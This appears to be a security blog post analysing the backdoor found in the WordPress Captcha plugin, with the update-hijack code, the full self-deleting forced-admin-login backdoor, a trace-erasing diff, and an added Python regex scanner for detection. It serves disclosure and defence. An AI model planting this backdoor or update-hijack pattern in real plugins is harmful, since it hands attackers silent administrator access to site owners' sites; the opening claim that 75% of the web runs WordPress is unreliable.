WordPress is the most widely used content management system in the world; 75% of the web is made up of WordPress. One reason for its huge success is its plugin support, which turns a simple WordPress site into a complex web application. Recently the Captcha plugin was removed from the WordPress plugin repository because it contained a backdoor.
Wordfence looked into the plugin when it was removed from the repository. What caught their attention was its large user base: about 300K websites were using the Captcha plugin.
When they looked at the source code they found this:
```php
function cptch_wp_plugin_auto_update() {
    require_once ('cptch_wp_auto_update.php');
    global $cptch_plugin_info;
    $wptuts_plugin_current_version = $cptch_plugin_info['Version'];
    $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
    $wptuts_plugin_slug = plugin_basename(__FILE__);
    new cptch_wp_auto_update($wptuts_plugin_current_version, $wptuts_plugin_remote_path, $wptuts_plugin_slug);
}
```
This starts an update process that downloads a file from https://simplywordpress[dot]net/captcha/captcha_pro_update.php. Since the download is a zip archive, the plugin extracts it and installs its contents over the existing copy of the Captcha plugin.
The downloaded files are almost identical to the repository version, but with a small code change in plugin-update.php, which is the backdoor:
```php
@unlink(__FILE__);
require('../../../wp-blog-header.php');
require('../../../wp-includes/pluggable.php');
$user_info = get_userdata(1);
// Automatic login //
$username = $user_info->user_login;
$user = get_user_by('login', $username );
// Redirect URL //
if ( !is_wp_error( $user ) ) {
    wp_clear_auth_cookie();
    wp_set_current_user ( $user->ID );
    wp_set_auth_cookie ( $user->ID );
    $redirect_to = user_admin_url();
    wp_safe_redirect( $redirect_to );
    exit();
}
```
This backdoor gives the attacker or plugin author unauthorized administrative access to any website that has this plugin installed. It creates a session for user ID 1, which is normally the site administrator, sets the authentication cookies for that user, and then deletes itself from disk (the @unlink(__FILE__) at the top) so that nothing is left behind after it has run.
Another change in the downloaded file is:
```diff
< $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
---
> $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';
```
The code downloaded from https://simplywordpress[dot]net/captcha/captcha_free_update.php is identical to what is in the plugin repository, so triggering the same automatic update process a second time removes all file-system traces of the backdoor, making it look as if it was never there and helping the attacker avoid detection.
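Because the backdoor deletes itself after use and the follow-up update overwrites the plugin with a clean copy, a defender has to look for the pattern rather than for a known file hash. The scanner below is an added example (not Wordfence's or the plugin's code) that flags PHP files combining the indicators visible in the snippet above: self-deletion with `unlink(__FILE__)`, a lookup of user ID 1, a forced `wp_set_auth_cookie()` login, bootstrapping WordPress via a relative `wp-blog-header.php` include, and an update endpoint outside wordpress.org. The weights, threshold and sample files are constructed for the demo.

```python
"""Indicator scan for the self-deleting forced-login backdoor pattern described above."""
import re
from pathlib import Path

# (name, regex, weight). Weights are an assumption used only for triage ordering.
INDICATORS = [
    ("self_delete",    re.compile(r"@?unlink\s*\(\s*__FILE__\s*\)"), 3),
    ("admin_lookup",   re.compile(r"get_userdata\s*\(\s*1\s*\)"), 2),
    ("forced_login",   re.compile(r"wp_set_auth_cookie\s*\("), 2),
    ("core_bootstrap", re.compile(r"require(?:_once)?\s*\(\s*['\"](?:\.\./)+wp-blog-header\.php"), 2),
    # Any update URL whose host is not (a subdomain of) wordpress.org.
    ("offsite_update", re.compile(r"https?://(?!(?:[\w-]+\.)*wordpress\.org/)[\w.-]+/[^'\"]*update[^'\"]*\.php"), 1),
]

def scan_source(src: str) -> dict:
    """Return the names of matching indicators and their summed weight."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"hits": hits, "score": score}

def scan_plugin_dir(root: Path, threshold: int = 5) -> list:
    """Walk a wp-content/plugins tree and report files scoring at or above threshold."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        try:
            result = scan_source(path.read_text(errors="ignore"))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if result["score"] >= threshold:
            findings.append((str(path.relative_to(root)), result))
    return findings

# Constructed samples: a reduced copy of the backdoor quoted on the page, and a benign file.
BACKDOOR_SAMPLE = """<?php
@unlink(__FILE__);
require('../../../wp-blog-header.php');
$user_info = get_userdata(1);
$user = get_user_by('login', $user_info->user_login);
wp_set_current_user($user->ID);
wp_set_auth_cookie($user->ID);
"""
BENIGN_SAMPLE = """<?php
$remote = 'https://api.wordpress.org/plugins/update-check/1.1/';
if (is_user_logged_in()) { wp_safe_redirect(admin_url()); exit; }
"""

if __name__ == "__main__":
    for label, src in (("backdoor", BACKDOOR_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_source(src))
```

Run `scan_plugin_dir(Path("/path/to/wp-content/plugins"))` against a site to list files worth manual review; a single indicator (for example an off-site update URL alone) is not proof of compromise, which is why the score threshold exists.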
Why did this happen, and who did it?
This Captcha plugin was previously owned by BestWebSoft. On September 5, 2017 BestWebSoft announced a change in ownership without naming the new owner.
Looking at the website from which the files are downloaded, it was found that the domain was registered to Stacy Wellington, a known plugin spammer who buys up plugins with a large user base and uses them to inject backlinks in order to raise Google page rank in SERPs.